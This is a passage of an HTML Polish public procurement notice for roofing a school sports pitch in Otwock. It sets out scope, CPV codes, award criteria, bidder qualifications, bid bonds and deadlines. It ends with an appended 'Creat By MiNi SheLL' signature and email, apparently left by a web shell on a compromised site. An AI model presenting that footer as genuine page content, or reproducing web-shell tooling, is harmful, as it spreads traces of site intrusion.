class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Wykonanie, w systemie „zaprojektuj i wybuduj”, kompletnej dokumentacji projektowo-kosztorysowej oraz wykonanie na jej podstawie robót budowlanych dla zadania inwestycyjnego pn.:<br/>Część III: „Budowa zadaszenia o stałej konstrukcji istniejącego boiska wielofunkcyjnego przy Szkole Podstawowej nr 12 im.<br/>Kornela Makuszyńskiego w Otwocku”,<br/>w ramach zadania budżetowego pn. „Budowa zadaszenia o stałej konstrukcji istniejącego boiska wielofunkcyjnego przy<br/>Szkole Podstawowej nr 2 im. Kornela Makuszyńskiego w Otwocku” oraz udzielenie gwarancji na wykonany przedmiot<br/>zamówienia.<br/>1. Przedmiot zamówienia realizowany będzie zgodnie z Programem Funkcjonalno-Użytkowym zawartym w Załączniku nr 1<br/>do umowy i określonym w nim zakresem w podziale<br/>na następujące etapy:<br/>a) Etap I obejmuje: wykonanie inwentaryzacji w zakresie niezbędnym do wykonania przedmiotu zamówienia, koncepcji i<br/>następnie kompletnego projektu budowlanego i technicznych projektów branżowych wraz z dokumentacją kosztorysową i<br/>uzyskanie ostatecznego pozwolenia na budowę,<br/>b) Etap II obejmuje: wykonanie wszystkich robót i czynności związanych z wykonaniem obiektu wymienionych w PFU oraz<br/>zgodnie z opracowaną dokumentacją projektową, pełnienie nadzoru autorskiego nad realizacją robót budowalnych<br/>wykonanie i przekazanie dokumentacji powykonawczej,<br/>c) Etap III obejmuje: przeprowadzenie odbiorów, przeprowadzenie szkoleń personelu użytkownika, uzyskanie pozwolenia na<br/>użytkowanie nowopowstałych obiektów.<br/>2. W ramach wykonania przedmiotu umowy Wykonawca w szczególności:<br/>1) wykona kompletną dokumentację projektową, uzyska pozwolenie na budowę i niezbędne zgody opinie i uzgodnienia oraz<br/>zapewni nadzór autorski nad realizacją robót budowlanych realizowanych na podstawie ww. projektu,<br/>2) wykona wszystkie czynności związane z wykonaniem obiektu, z uwzględnieniem podziału wykonania przedmiotu<br/>zamówienia na Etapy, części i zakresy, w szczególności:<br/>a) roboty budowlane polegające na rozbiórce istniejącej infrastruktury obiektu, przygotowaniu terenu, budowie zadaszenia<br/>istniejącego boiska w formie hali łukowej wraz z zapleczem sanitarno-szatniowym oraz infrastrukturą towarzyszącą,<br/>instalacjami i urządzeniami technologicznymi,<br/>b) dostosowanie zagospodarowania terenu w związku z uruchomieniem nowego obiektu na terenie funkcjonującej Szkoły<br/>Podstawowej w zakresie niezbędnej przebudowy chodników oraz urządzenia/uzupełnienia terenów zielonych,<br/>c) dostawę oraz instalację wyposażenia obiektu w sprzęt i niezbędne umeblowanie wraz z wyposażeniem sportowym,<br/>d) rozruch wszystkich urządzeń, zgodnie z zatwierdzoną dokumentacją projektową,<br/>3) wykona dokumentację powykonawczą;<br/>4) uzyska pozwolenie na użytkowanie nowych obiektów;<br/>5) przeniesie na Zamawiającego majątkowe prawa autorskie do dokumentacji projektowej, oraz do dokumentacji<br/>powykonawczej;<br/>6) udzieli gwarancji i rękojmi na wykonane roboty i dostarczone w ramach zamówienia elementy w szczególności:<br/>dokumentację, urządzenia, systemy wyposażenie i instalacje na warunkach określonych w umowie.<br/>3. Zakres rzeczowy przedmiotu zamówienia określa Program Funkcjonalno-Użytkowy i umowa zawarte w Specyfikacji<br/>Warunków Zamówienia, która wraz ofertą przetargową Wykonawcy stanowić będą integralną całość umowy zawartej w<br/>wyniku przeprowadzonego postępowania.<br/>4. Przedmiot zamówienia będzie wykonywany zgodnie z zasadami wiedzy technicznej i sztuki budowlanej, zgodnie z<br/>obowiązującymi przepisami, normami oraz na warunkach ustalonych z Wykonawcą i Zamawiającym na podstawie umowy.<br/>5. W trakcie przygotowywania oferty Wykonawca winien dokonać wizji lokalnej na terenie prowadzenia przyszłych prac,<br/>wszelkie niezgodności projektu ze stanem istniejącym<br/>są ryzykiem Wykonawcy i nie są podstawą do roszczeń o dodatkowe koszty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45212220-4 - Roboty budowlane związane z wielofunkcyjnymi obiektami sportowymi</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45212230-7 - Instalowanie szatni</p> <p class="mb-0">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielanie zamówień, o których mowa w art. 305 pkt 1) w związku z art. 214 ust. 1 pkt. 7 o wartości netto: cz. 3 - do kwoty<br/>600 000,00 zł., w zakresie polegającym na powtórzeniu podobnych rodzajowo prac zgodnych z przedmiotem zamówienia<br/>podstawowego, w tym pozostających w zgodności z podstawowym zamierzeniem budowlanym oraz związanym bezpośrednio przez<br/>identyfikację zamówienia z realizacją podstawowego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniają następujące warunki w postępowaniu:<br/><br/>1) nie podlegają wykluczeniu - z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których<br/>zachodzi którakolwiek z okoliczności wskazanych: w art. 108 ust. 1 oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r.<br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego,<br/><br/>2) którzy spełniają warunki dotyczące: zdolności technicznej lub zawodowej:<br/><br/>A. Wykonawca spełni warunek, jeżeli wykaże, że dysponuje/będzie dysponował <br/>oraz skieruje do realizacji zamówienia minimum 4* (cztery) osoby posiadające odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego, niezbędne do wykonania zamówienia w zakresie opracowania dokumentacji projektowej, tj.:<br/>a) minimum jedną osobę posiadającą uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń i wpisaną na listę członków izby samorządu zawodowego, która należycie wykonała minimum jedną usługę polegającą na wykonaniu dokumentacji projektowej (jako projektant główny/prowadzący) dla obiektów budowlanych zgodnie z ustawą Prawo budowlane zaliczanych do kat. V, IX, X, XI, XII, XV, XVI, XVIII o kubaturze nie mniejszej niż 4000 m3 i powierzchni użytkowej niemniejszej niż 800,00 m2 na stanowisku projektanta w specjalności architektonicznej, w okresie ostatnich 6 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/><br/>b) minimum jedną osobę posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno – budowlanej i wpisaną na listę członków izby samorządu zawodowego, która należycie wykonała minimum jedną usługę polegającą na wykonaniu dokumentacji projektowej dla obiektów budowlanych zgodnie z ustawą Prawo budowlane zaliczanych do kat. V, IX, X, XI, XII, XV, XVI, XVIII o kubaturze nie mniejszej niż 4000 m3 i powierzchni użytkowej niemniejszej niż 800,00 m2 w okresie ostatnich 6 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie;<br/><br/>c) minimum jedną osobę posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności elektrycznej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych (lub/i w specjalności teletechnicznej) i wpisaną na listę członków izby samorządu zawodowego, która należycie wykonała minimum jedną usługę, polegającą na wykonaniu dokumentacji projektowej dla obiektów budowlanych zgodnie z ustawą Prawo budowlane zaliczanych do kat. V, IX, X, XI, XII, XV, XVI, XVIII o kubaturze nie mniejszej niż 4000 m3 i powierzchni użytkowej niemniejszej niż 800,00 m2, w okresie ostatnich 6 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie; <br/><br/>d) minimum jedną osobę posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności sanitarnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych i wpisaną na listę członków izby samorządu zawodowego, która należycie wykonała minimum jedną usługę, polegającą na wykonaniu dokumentacji projektowej dla obiektów budowlanych zgodnie z ustawą Prawo budowlane zaliczanych do kat. V, IX, X, XI, XII, XV, XVI, XVIII o kubaturze nie mniejszej niż 4000 m3 i powierzchni użytkowej niemniejszej niż 800,00 m2, w okresie ostatnich 6 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie.<br/><br/><br/>(*) – Zamawiający dopuszcza, że warunek wykazania dysponowania przez Wykonawcę osobami zdolnymi do wykonania zamówienia zostanie spełniony jeśli jedna osoba, będzie posiadała ww. uprawnienia w więcej niż jednej z branż wymienionych w pkt od (a) do (d), wówczas odpowiednio zmniejszeniu ulega ilość wymaganych osób, które zgodnie z niniejszym warunkiem Wykonawca musi wykazać jako dysponowane i zdolne do wykonania zamówienia. Dla uniknięcia niejasności Zamawiający informuje, że jeśli Wykonawca wykaże, że dysponuje np. jedną osobą, która posiada odpowiednio uprawnienia określone w pkt (a) oraz pkt (d) odpowiednio będzie zobowiązany wykazać, że dysponuje jeszcze dwiema osobami, z których jedna posiada uprawnienia określone w pkt (b), a druga uprawnienia określone w pkt (c), tym samym przedmiotowy warunek udziału w postępowaniu zostanie spełniony przez wykazanie, przez Wykonawcę, że dysponuje 3 osobami, które posiadają wszystkie cztery, odpowiednie uprawnienia budowlane wymagane w zakresie wypełnienia i wykazania posiadania zdolności zawodowej dla wykonania przedmiotu zamówienia. <br/><br/>Przez wyżej wymienione uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których mowa w ustawie Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia <br/>o wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220).<br/><br/>B. Wykonawca spełni warunek, jeżeli wykaże, że dysponuje/będzie dysponował <br/>oraz skieruje do realizacji zamówienia minimum jedną osobę posiadającą odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego, niezbędne <br/>do wykonania zamówienia w zakresie realizacji robót, tj.:<br/><br/>a) Kierownika Budowy, który: <br/>a. posiada uprawnienia budowlane do kierowania robotami bez ograniczeń <br/>w specjalności konstrukcyjno-budowlanej (w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2023 r. poz. 682 t. j.) wraz z rozporządzeniami wykonawczymi lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220); <br/>b. wpisany jest na listę członków izby samorządu zawodowego; <br/>c. posiada minimum 12-miesięczne doświadczenie zawodowe w pełnieniu funkcji kierownika budowy w okresie ostatnich 5 lat przed upływem terminu składania ofert; <br/><br/><br/>C. Wykonawca spełni warunek, jeżeli wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres jest krótszy to w tym okresie, zrealizował <br/>i zakończył 1 inwestycję polegającą na budowie obiektu budowlanego kat. V, IX, X, XI, XII, XV, XVI, XVIII w rozumieniu ustawy Prawo Budowlane, a wartość zamówienia brutto wyniosła minimum: 900 000,00 PLN i kubaturze nie mniejszej niż 4000 m3. Wykonawca winien wykazać, że ww. robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień<br/>złożenia podmiotowych środków dowodowych:<br/>1) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami.<br/>2) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>cz. 1 – 60 000,00 zł., cz. 2 – 45 000,00 zł., cz. 3 – 40 000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Niezależnie od podstaw przewidzianych w Pzp Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 Pzp,<br/>możliwość dokonywania zmian postanowień umowy, w zakresie:<br/>1) zmiany wysokości wynagrodzenia w przypadku:<br/>a) zmiany stawki podatku od towarów i usług oraz podatku akcyzowego, z tym zastrzeżeniem, że wartość netto<br/>wynagrodzenia Wykonawcy nie zmieni się, a wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych<br/>przepisów;<br/>2) zmiany terminu wykonania umowy z powodów przyczyn nieleżących po stronie Wykonawcy, a jeżeli spowoduje to<br/>udokumentowany wzrost kosztów wykonania umowy, wraz ze stosownym wzrostem wynagrodzenia, w przypadku:<br/>a) działania organów administracji lub gestorów sieci związanego z przekroczeniem określonych przez prawo terminów<br/>wydawania wymaganych w związku z realizacją umowy, decyzji, zezwoleń, uzgodnień itp.;<br/>b) zmiany przepisów mających znaczenie dla wykonania umowy;<br/>c) innych niewymienionych przyczyn niezależnych od Wykonawcy, w szczególności:<br/>j) Zamawiający przewiduje możliwość zmiany terminu realizacji przedmiotu umowy, jeżeli wystąpi konieczność<br/>zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy zastosowaniu odmiennych rozwiązań<br/>technicznych lub technologicznych, niż wskazane w dokumentacji projektowej, lub zmiany stanu prawnego w oparciu, o<br/>który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym<br/>wykonaniem przedmiotu umowy.<br/>ii) Zamawiający przewiduje możliwość zmiany terminu realizacji przedmiotu umowy, jeżeli wystąpi konieczność realizacji<br/>robót wynikających z wprowadzenia w dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu<br/>budowlanego, wynikających z art. 36a ust. 1 ustawy Prawo Budowlane.<br/>iii) Zamawiający przewiduje możliwość zmiany terminu realizacji przedmiotu umowy, w przypadku wystąpienia warunków na<br/>placu budowy odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, w szczególności napotkania<br/>niezinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych.<br/>(...)<br/>d) pojawienia się na rynku urządzenia producenta sprzętu nowszej generacji lub nowej wersji oprogramowania, o lepszych<br/>parametrach i pozwalających na zaoszczędzenie kosztów eksploatacji pod warunkiem, że te zmiany nie spowodują<br/>zwiększenia ceny;<br/>e) ujawnienia się powszechnie występujących wad projektowanego materiału lub urządzenia. Zamawiający dopuszcza<br/>zmianę w zakresie przedmiotu umowy polegającą na zastąpieniu danego produktu produktem zastępczym, spełniającym<br/>wszelkie wymagania przewidziane w SWZ dla produktu zastępowanego, rekomendowanym przez producenta lub<br/>Wykonawcę w związku z ujawnieniem wad;<br/>f) wystąpienia siły wyższej.<br/>2. W przypadku kiedy planowane zmiany mają istotny wpływ na zmianę wynagrodzenia Wykonawca może wystąpić do Zamawiającego z pisemnym wnioskiem o zmianę wynagrodzenia, przedkładając odpowiednie dokumenty potwierdzające<br/>zasadność złożenia takiego wniosku. Wykonawca powinien wykazać, że zaistniała zmiana ma bezpośredni wpływ na koszty<br/>wykonania przedmiotu umowy oraz określić stopień, w jakim wpłynie ona na wysokość wynagrodzenia.<br/>3. Wykonawca jest zobowiązany w terminie 5 dni roboczych od zawarcia aneksu do umowy do zaktualizowania i<br/>uzgodnienia z Zamawiającym Harmonogramu, o którym mowa w § 1 ust. 5, z zastrzeżeniem że w przypadku zawarcia<br/>aneksu, z uwagi na ewentualną konieczność wstrzymania robót, aktualizacja i uzgodnienie harmonogramu rzeczowofinansowego<br/>nastąpi nie później niż w terminie 5 dni roboczych od dnia ponownego wprowadzenia Wykonawcy na teren<br/>robót.<br/>4. Zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-05</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com